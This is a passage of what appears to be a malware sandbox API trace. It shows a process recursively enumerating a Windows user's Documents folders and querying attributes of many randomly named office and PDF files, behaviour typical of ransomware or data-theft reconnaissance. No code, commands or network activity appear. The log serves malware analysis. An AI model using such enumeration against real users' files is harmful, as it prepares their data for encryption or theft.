ftLastWriteTime.dwHighDateTime=0x1d41f10, nFileSizeHigh=0x0, nFileSizeLow=0x3bb5)) returned 1 [0043.876] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\j7a6aj99x6358L.pps" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\j7a6aj99x6358l.pps"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc876a770, ftCreationTime.dwHighDateTime=0x1d4200d, ftLastAccessTime.dwLowDateTime=0x21b49440, ftLastAccessTime.dwHighDateTime=0x1d4198e, ftLastWriteTime.dwLowDateTime=0x21b49440, ftLastWriteTime.dwHighDateTime=0x1d4198e, nFileSizeHigh=0x0, nFileSizeLow=0xcbe4)) returned 1 [0043.876] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\JbQb3 PH.rtf" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\jbqb3 ph.rtf"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3df6c10, ftCreationTime.dwHighDateTime=0x1d4192f, ftLastAccessTime.dwLowDateTime=0x785276c0, ftLastAccessTime.dwHighDateTime=0x1d41b9e, ftLastWriteTime.dwLowDateTime=0x785276c0, ftLastWriteTime.dwHighDateTime=0x1d41b9e, nFileSizeHigh=0x0, nFileSizeLow=0x12a3d)) returned 1 [0043.876] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\jZPxua.pps" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\jzpxua.pps"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4eba00, ftCreationTime.dwHighDateTime=0x1d41e05, ftLastAccessTime.dwLowDateTime=0xc9f429a0, ftLastAccessTime.dwHighDateTime=0x1d4169f, ftLastWriteTime.dwLowDateTime=0xc9f429a0, ftLastWriteTime.dwHighDateTime=0x1d4169f, nFileSizeHigh=0x0, nFileSizeLow=0x15fe9)) returned 1 [0043.877] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\kh0OV-dsConnc2PvE8S.rtf" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\kh0ov-dsconnc2pve8s.rtf"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9676d30, ftCreationTime.dwHighDateTime=0x1d417a1, ftLastAccessTime.dwLowDateTime=0x748f1e40, ftLastAccessTime.dwHighDateTime=0x1d41b7f, ftLastWriteTime.dwLowDateTime=0x748f1e40, ftLastWriteTime.dwHighDateTime=0x1d41b7f, nFileSizeHigh=0x0, nFileSizeLow=0x10989)) returned 1 [0043.877] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\N45nd3sPnu29FhVt.rtf" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\n45nd3spnu29fhvt.rtf"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x316f0300, ftCreationTime.dwHighDateTime=0x1d42048, ftLastAccessTime.dwLowDateTime=0x374f7320, ftLastAccessTime.dwHighDateTime=0x1d41195, ftLastWriteTime.dwLowDateTime=0x374f7320, ftLastWriteTime.dwHighDateTime=0x1d41195, nFileSizeHigh=0x0, nFileSizeLow=0x11112)) returned 1 [0043.877] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\tPzuMEejjF.pdf" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\tpzumeejjf.pdf"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x876d5a90, ftCreationTime.dwHighDateTime=0x1d41c4c, ftLastAccessTime.dwLowDateTime=0xf4ff6850, ftLastAccessTime.dwHighDateTime=0x1d41c1f, ftLastWriteTime.dwLowDateTime=0xf4ff6850, ftLastWriteTime.dwHighDateTime=0x1d41c1f, nFileSizeHigh=0x0, nFileSizeLow=0x11c95)) returned 1 [0043.878] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\_V40ECOtDketLHYst.odt" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\_v40ecotdketlhyst.odt"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23862210, ftCreationTime.dwHighDateTime=0x1d4157f, ftLastAccessTime.dwLowDateTime=0x690d5f80, ftLastAccessTime.dwHighDateTime=0x1d4194c, ftLastWriteTime.dwLowDateTime=0x690d5f80, ftLastWriteTime.dwHighDateTime=0x1d4194c, nFileSizeHigh=0x0, nFileSizeLow=0x1818a)) returned 1 [0043.878] FindClose (in: hFindFile=0x29a840 | out: hFindFile=0x29a840) returned 1 [0043.878] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\7oxt4.csv" (normalized: "c:\\users\\eebsym5\\documents\\7oxt4.csv"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b24b2f0, ftCreationTime.dwHighDateTime=0x1d41e44, ftLastAccessTime.dwLowDateTime=0x23412ec0, ftLastAccessTime.dwHighDateTime=0x1d4112a, ftLastWriteTime.dwLowDateTime=0x23412ec0, ftLastWriteTime.dwHighDateTime=0x1d4112a, nFileSizeHigh=0x0, nFileSizeLow=0xb403)) returned 1 [0043.879] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\83XR9j9M5.docx" (normalized: "c:\\users\\eebsym5\\documents\\83xr9j9m5.docx"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4779cdb0, ftCreationTime.dwHighDateTime=0x1d3eb8c, ftLastAccessTime.dwLowDateTime=0x300207b0, ftLastAccessTime.dwHighDateTime=0x1d41de6, ftLastWriteTime.dwLowDateTime=0x300207b0, ftLastWriteTime.dwHighDateTime=0x1d41de6, nFileSizeHigh=0x0, nFileSizeLow=0xf408)) returned 1 [0043.879] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\AsSaLSf QVmb1.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\assalsf qvmb1.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe31c4b80, ftCreationTime.dwHighDateTime=0x1d3fe1f, ftLastAccessTime.dwLowDateTime=0x5cb32db0, ftLastAccessTime.dwHighDateTime=0x1d3b938, ftLastWriteTime.dwLowDateTime=0x5cb32db0, ftLastWriteTime.dwHighDateTime=0x1d3b938, nFileSizeHigh=0x0, nFileSizeLow=0x16ccc)) returned 1 [0043.880] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\B2azdPvI8g.odt" (normalized: "c:\\users\\eebsym5\\documents\\b2azdpvi8g.odt"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d4457b0, ftCreationTime.dwHighDateTime=0x1d412d1, ftLastAccessTime.dwLowDateTime=0x69e1bf30, ftLastAccessTime.dwHighDateTime=0x1d4188b, ftLastWriteTime.dwLowDateTime=0x69e1bf30, ftLastWriteTime.dwHighDateTime=0x1d4188b, nFileSizeHigh=0x0, nFileSizeLow=0x7a90)) returned 1 [0043.880] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\cI RCT.pptx" (normalized: "c:\\users\\eebsym5\\documents\\ci rct.pptx"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d52a140, ftCreationTime.dwHighDateTime=0x1d3f0a4, ftLastAccessTime.dwLowDateTime=0xbe7dc080, ftLastAccessTime.dwHighDateTime=0x1d4054d, ftLastWriteTime.dwLowDateTime=0xbe7dc080, ftLastWriteTime.dwHighDateTime=0x1d4054d, nFileSizeHigh=0x0, nFileSizeLow=0xd9db)) returned 1 [0043.880] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\desktop.ini" (normalized: "c:\\users\\eebsym5\\documents\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xec4346c0, ftLastWriteTime.dwHighDateTime=0x1d2f581, nFileSizeHigh=0x0, nFileSizeLow=0x192)) returned 1 [0043.881] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\dlYgqmn_Mo2E0db.csv" (normalized: "c:\\users\\eebsym5\\documents\\dlygqmn_mo2e0db.csv"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6156f7e0, ftCreationTime.dwHighDateTime=0x1d416dd, ftLastAccessTime.dwLowDateTime=0xa56be370, ftLastAccessTime.dwHighDateTime=0x1d417f3, ftLastWriteTime.dwLowDateTime=0xa56be370, ftLastWriteTime.dwHighDateTime=0x1d417f3, nFileSizeHigh=0x0, nFileSizeLow=0x17bf6)) returned 1 [0043.881] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\documents\\exjzdxjf x\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0x29a840 [0043.881] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\exjzdxjf x\\CCxN.odp" (normalized: "c:\\users\\eebsym5\\documents\\exjzdxjf x\\ccxn.odp"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe22d5e50, ftCreationTime.dwHighDateTime=0x1d4179f, ftLastAccessTime.dwLowDateTime=0x28b22000, ftLastAccessTime.dwHighDateTime=0x1d41556, ftLastWriteTime.dwLowDateTime=0x28b22000, ftLastWriteTime.dwHighDateTime=0x1d41556, nFileSizeHigh=0x0, nFileSizeLow=0x6060)) returned 1 [0043.882] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\exjzdxjf x\\dgQb2X.ots" (normalized: "c:\\users\\eebsym5\\documents\\exjzdxjf x\\dgqb2x.ots"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30327b0, ftCreationTime.dwHighDateTime=0x1d41efb, ftLastAccessTime.dwLowDateTime=0x6eb14960, ftLastAccessTime.dwHighDateTime=0x1d416ae, ftLastWriteTime.dwLowDateTime=0x6eb14960, ftLastWriteTime.dwHighDateTime=0x1d416ae, nFileSizeHigh=0x0, nFileSizeLow=0x104f9)) returned 1 [0043.882] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\exjzdxjf x\\Ih5F4uTBa8SZ p752W4.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\exjzdxjf x\\ih5f4utba8sz p752w4.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78147080, ftCreationTime.dwHighDateTime=0x1d41d58, ftLastAccessTime.dwLowDateTime=0x77561ee0, ftLastAccessTime.dwHighDateTime=0x1d41edf, ftLastWriteTime.dwLowDateTime=0x77561ee0, ftLastWriteTime.dwHighDateTime=0x1d41edf, nFileSizeHigh=0x0, nFileSizeLow=0x6f24)) returned 1 [0043.885] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\exjzdxjf x\\nuyI16ZC.ots" (normalized: "c:\\users\\eebsym5\\documents\\exjzdxjf x\\nuyi16zc.ots"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x664da920, ftCreationTime.dwHighDateTime=0x1d410ce, ftLastAccessTime.dwLowDateTime=0x6c522e40, ftLastAccessTime.dwHighDateTime=0x1d41b91, ftLastWriteTime.dwLowDateTime=0x6c522e40, ftLastWriteTime.dwHighDateTime=0x1d41b91, nFileSizeHigh=0x0, nFileSizeLow=0x15c07)) returned 1 [0043.886] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\exjzdxjf x\\QxK3gxYk8.ots" (normalized: "c:\\users\\eebsym5\\documents\\exjzdxjf x\\qxk3gxyk8.ots"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafb35810, ftCreationTime.dwHighDateTime=0x1d416f2, ftLastAccessTime.dwLowDateTime=0x3d6fd360, ftLastAccessTime.dwHighDateTime=0x1d41723, ftLastWriteTime.dwLowDateTime=0x3d6fd360, ftLastWriteTime.dwHighDateTime=0x1d41723, nFileSizeHigh=0x0, nFileSizeLow=0xac08)) returned 1 [0043.886] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\exjzdxjf x\\r_FrwF0zDI3q.docx" (normalized: "c:\\users\\eebsym5\\documents\\exjzdxjf x\\r_frwf0zdi3q.docx"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebfc1860, ftCreationTime.dwHighDateTime=0x1d4160d, ftLastAccessTime.dwLowDateTime=0x989afcc0, ftLastAccessTime.dwHighDateTime=0x1d4152e, ftLastWriteTime.dwLowDateTime=0x989afcc0, ftLastWriteTime.dwHighDateTime=0x1d4152e, nFileSizeHigh=0x0, nFileSizeLow=0x13140)) returned 1 [0043.886] FindClose (in: hFindFile=0x29a840 | out: hFindFile=0x29a840) returned 1 [0043.887] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\EZb 5mCCKh.docx" (normalized: "c:\\users\\eebsym5\\documents\\ezb 5mcckh.docx"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ee7c790, ftCreationTime.dwHighDateTime=0x1d414cb, ftLastAccessTime.dwLowDateTime=0x5300cb60, ftLastAccessTime.dwHighDateTime=0x1d3d6fc, ftLastWriteTime.dwLowDateTime=0x5300cb60, ftLastWriteTime.dwHighDateTime=0x1d3d6fc, nFileSizeHigh=0x0, nFileSizeLow=0x15708)) returned 1 [0043.887] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\gw4KPKu.pptx" (normalized: "c:\\users\\eebsym5\\documents\\gw4kpku.pptx"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf98da40, ftCreationTime.dwHighDateTime=0x1d3af74, ftLastAccessTime.dwLowDateTime=0x5c4f2000, ftLastAccessTime.dwHighDateTime=0x1d3f947, ftLastWriteTime.dwLowDateTime=0x5c4f2000, ftLastWriteTime.dwHighDateTime=0x1d3f947, nFileSizeHigh=0x0, nFileSizeLow=0xab00)) returned 1 [0043.887] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\hp 49EWPNtmDjpH.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\hp 49ewpntmdjph.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd56ad460, ftCreationTime.dwHighDateTime=0x1d41149, ftLastAccessTime.dwLowDateTime=0xa5d23c0, ftLastAccessTime.dwHighDateTime=0x1d410dd, ftLastWriteTime.dwLowDateTime=0xa5d23c0, ftLastWriteTime.dwHighDateTime=0x1d410dd, nFileSizeHigh=0x0, nFileSizeLow=0xbf1b)) returned 1 [0043.888] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\IO75.docx" (normalized: "c:\\users\\eebsym5\\documents\\io75.docx"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0a648b0, ftCreationTime.dwHighDateTime=0x1d404b8, ftLastAccessTime.dwLowDateTime=0xaa866590, ftLastAccessTime.dwHighDateTime=0x1d40b2f, ftLastWriteTime.dwLowDateTime=0xaa866590, ftLastWriteTime.dwHighDateTime=0x1d40b2f, nFileSizeHigh=0x0, nFileSizeLow=0x18ced)) returned 1 [0043.888] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\ml9pSGffNNqcRjwM_.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\ml9psgffnnqcrjwm_.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5e65c30, ftCreationTime.dwHighDateTime=0x1d41e37, ftLastAccessTime.dwLowDateTime=0x6b6f1550, ftLastAccessTime.dwHighDateTime=0x1d3e32a, ftLastWriteTime.dwLowDateTime=0x6b6f1550, ftLastWriteTime.dwHighDateTime=0x1d3e32a, nFileSizeHigh=0x0, nFileSizeLow=0x934a)) returned 1 [0043.888] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\documents\\my music\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0xffffffff [0043.889] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\documents\\my pictures\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0xffffffff [0043.889] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\documents\\my shapes\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0x29a840 [0043.890] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\my shapes\\desktop.ini" (normalized: "c:\\users\\eebsym5\\documents\\my shapes\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x3beea730, ftCreationTime.dwHighDateTime=0x1d30236, ftLastAccessTime.dwLowDateTime=0x3beea730, ftLastAccessTime.dwHighDateTime=0x1d30236, ftLastWriteTime.dwLowDateTime=0x3beea730, ftLastWriteTime.dwHighDateTime=0x1d30236, nFileSizeHigh=0x0, nFileSizeLow=0xd8)) returned 1 [0043.891] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\documents\\my shapes\\_private\\\\*", lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 0x2981c0 [0043.893] FindClose (in: hFindFile=0x2981c0 | out: hFindFile=0x2981c0) returned 1 [0043.893] FindClose (in: hFindFile=0x29a840 | out: hFindFile=0x29a840) returned 1 [0043.893] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\documents\\my videos\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0xffffffff [0043.893] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\oODJS7TKuDi2G.pdf" (normalized: "c:\\users\\eebsym5\\documents\\oodjs7tkudi2g.pdf"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6239920, ftCreationTime.dwHighDateTime=0x1d410ff, ftLastAccessTime.dwLowDateTime=0xff1ce6c0, ftLastAccessTime.dwHighDateTime=0x1d41b1e, ftLastWriteTime.dwLowDateTime=0xff1ce6c0, ftLastWriteTime.dwHighDateTime=0x1d41b1e, nFileSizeHigh=0x0, nFileSizeLow=0x1250e)) returned 1 [0043.893] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0x29a840 [0043.894] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\6pyNh7G.csv" (normalized: "c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\6pynh7g.csv"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e81b070, ftCreationTime.dwHighDateTime=0x1d4192a, ftLastAccessTime.dwLowDateTime=0xd4eadf00, ftLastAccessTime.dwHighDateTime=0x1d41c0a, ftLastWriteTime.dwLowDateTime=0xd4eadf00, ftLastWriteTime.dwHighDateTime=0x1d41c0a, nFileSizeHigh=0x0, nFileSizeLow=0xf9a5)) returned 1 [0043.894] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\byo3dmdt4wvs\\\\*", lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 0x2981c0 [0043.894] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\byo3dmdt4wvs\\6u7cQlV2Yc7 AApv.pdf" (normalized: "c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\byo3dmdt4wvs\\6u7cqlv2yc7 aapv.pdf"), fInfoLevelId=0x0, lpFileInformation=0x12d3bc | out: lpFileInformation=0x12d3bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x392aeff0, ftCreationTime.dwHighDateTime=0x1d41a53, ftLastAccessTime.dwLowDateTime=0x6ed4cb0, ftLastAccessTime.dwHighDateTime=0x1d41be6, ftLastWriteTime.dwLowDateTime=0x6ed4cb0, ftLastWriteTime.dwHighDateTime=0x1d41be6, nFileSizeHigh=0x0, nFileSizeLow=0x893b)) returned 1 [0043.895] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\byo3dmdt4wvs\\cH -GyeXvIn_MRDn.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\byo3dmdt4wvs\\ch -gyexvin_mrdn.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x12d3bc | out: lpFileInformation=0x12d3bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70b60f20, ftCreationTime.dwHighDateTime=0x1d42027, ftLastAccessTime.dwLowDateTime=0x49e992e0, ftLastAccessTime.dwHighDateTime=0x1d41b68, ftLastWriteTime.dwLowDateTime=0x49e992e0, ftLastWriteTime.dwHighDateTime=0x1d41b68, nFileSizeHigh=0x0, nFileSizeLow=0x15026)) returned 1 [0043.895] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\byo3dmdt4wvs\\ouKm7wa6be3f.docx" (normalized: "c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\byo3dmdt4wvs\\oukm7wa6be3f.docx"), fInfoLevelId=0x0, lpFileInformation=0x12d3bc | out: lpFileInformation=0x12d3bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97c6cb90, ftCreationTime.dwHighDateTime=0x1d412b7, ftLastAccessTime.dwLowDateTime=0xbcfe87f0, ftLastAccessTime.dwHighDateTime=0x1d4102c, ftLastWriteTime.dwLowDateTime=0xbcfe87f0, ftLastWriteTime.dwHighDateTime=0x1d4102c, nFileSizeHigh=0x0, nFileSizeLow=0x32db)) returned 1 [0043.895] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\byo3dmdt4wvs\\T9cHl2jCFn XY.csv" (normalized: "c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\byo3dmdt4wvs\\t9chl2jcfn xy.csv"), fInfoLevelId=0x0, lpFileInformation=0x12d3bc | out: lpFileInformation=0x12d3bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7dcdfe60, ftCreationTime.dwHighDateTime=0x1d4170e, ftLastAccessTime.dwLowDateTime=0xc412e610, ftLastAccessTime.dwHighDateTime=0x1d418e4, ftLastWriteTime.dwLowDateTime=0xc412e610, ftLastWriteTime.dwHighDateTime=0x1d418e4, nFileSizeHigh=0x0, nFileSizeLow=0x15bc4)) returned 1 [0043.896] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\byo3dmdt4wvs\\TGjVK2tf.rtf" (normalized: "c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\byo3dmdt4wvs\\tgjvk2tf.rtf"), fInfoLevelId=0x0, lpFileInformation=0x12d3bc | out: lpFileInformation=0x12d3bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb815c70, ftCreationTime.dwHighDateTime=0x1d4151d, ftLastAccessTime.dwLowDateTime=0x95917430, ftLastAccessTime.dwHighDateTime=0x1d41a3a, ftLastWriteTime.dwLowDateTime=0x95917430, ftLastWriteTime.dwHighDateTime=0x1d41a3a, nFileSizeHigh=0x0, nFileSizeLow=0x17a59)) returned 1 [0043.896] FindClose (in: hFindFile=0x2981c0 | out: hFindFile=0x2981c0) returned 1 [0043.896] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\isuld5qpzucuehou8g\\\\*", lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 0x2981c0 [0043.897] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\isuld5qpzucuehou8g\\4qN_1NsdmGu6iObg.pps" (normalized: "c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\isuld5qpzucuehou8g\\4qn_1nsdmgu6iobg.pps"), fInfoLevelId=0x0, lpFileInformation=0x12d3bc | out: lpFileInformation=0x12d3bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c55ad40, ftCreationTime.dwHighDateTime=0x1d41bb7, ftLastAccessTime.dwLowDateTime=0x219588f0, ftLastAccessTime.dwHighDateTime=0x1d41a9e, ftLastWriteTime.dwLowDateTime=0x219588f0, ftLastWriteTime.dwHighDateTime=0x1d41a9e, nFileSizeHigh=0x0, nFileSizeLow=0x12594)) returned 1 [0043.897] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\isuld5qpzucuehou8g\\EdyrIt5hDiki.pps" (normalized: "c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\isuld5qpzucuehou8g\\edyrit5hdiki.pps"), fInfoLevelId=0x0, lpFileInformation=0x12d3bc | out: lpFileInformation=0x12d3bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50a34ac0, ftCreationTime.dwHighDateTime=0x1d41994, ftLastAccessTime.dwLowDateTime=0x5c855c90, ftLastAccessTime.dwHighDateTime=0x1d41b04, ftLastWriteTime.dwLowDateTime=0x5c855c90, ftLastWriteTime.dwHighDateTime=0x1d41b04, nFileSizeHigh=0x0, nFileSizeLow=0x1795e)) returned 1 [0043.897] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\isuld5qpzucuehou8g\\fge-HstNr6FR.xls" (normalized: "c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\isuld5qpzucuehou8g\\fge-hstnr6fr.xls"), fInfoLevelId=0x0, lpFileInformation=0x12d3bc | out: lpFileInformation=0x12d3bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34586210, ftCreationTime.dwHighDateTime=0x1d41c3c, ftLastAccessTime.dwLowDateTime=0xfd6f05b0, ftLastAccessTime.dwHighDateTime=0x1d41dfd, ftLastWriteTime.dwLowDateTime=0xfd6f05b0, ftLastWriteTime.dwHighDateTime=0x1d41dfd, nFileSizeHigh=0x0, nFileSizeLow=0x4687)) returned 1 [0043.898] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\isuld5qpzucuehou8g\\jFkUtyUm6 SFXcEq35H6.xls" (normalized: "c:\\users\\eebsym5\\documents\\oulu1jheg4qgc\\isuld5qpzucuehou8g\\jfkutyum6 sfxceq35h6.xls"), fInfoLevelId=0x0, lpFileInformation=0x12d3bc | out: lpFileInformation=0x12d3bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87180c80, ftCreationTime.dwHighDateTime=0x1d41908, ftLastAccessTime.dwLowDateTime=0x6d3bfd00, ftLastAccessTime.dwHighDateTime=0x1d41b18, ftLastWriteTime.dwLowDateTime=0x6d3bfd00, ftLastWriteTime.dwHighDateTime=0x1d41b18, nFileSizeHigh=0x0, nFileSizeLow=0xf599)) returned 1 [0043.898] GetFileAttributesExW (in: 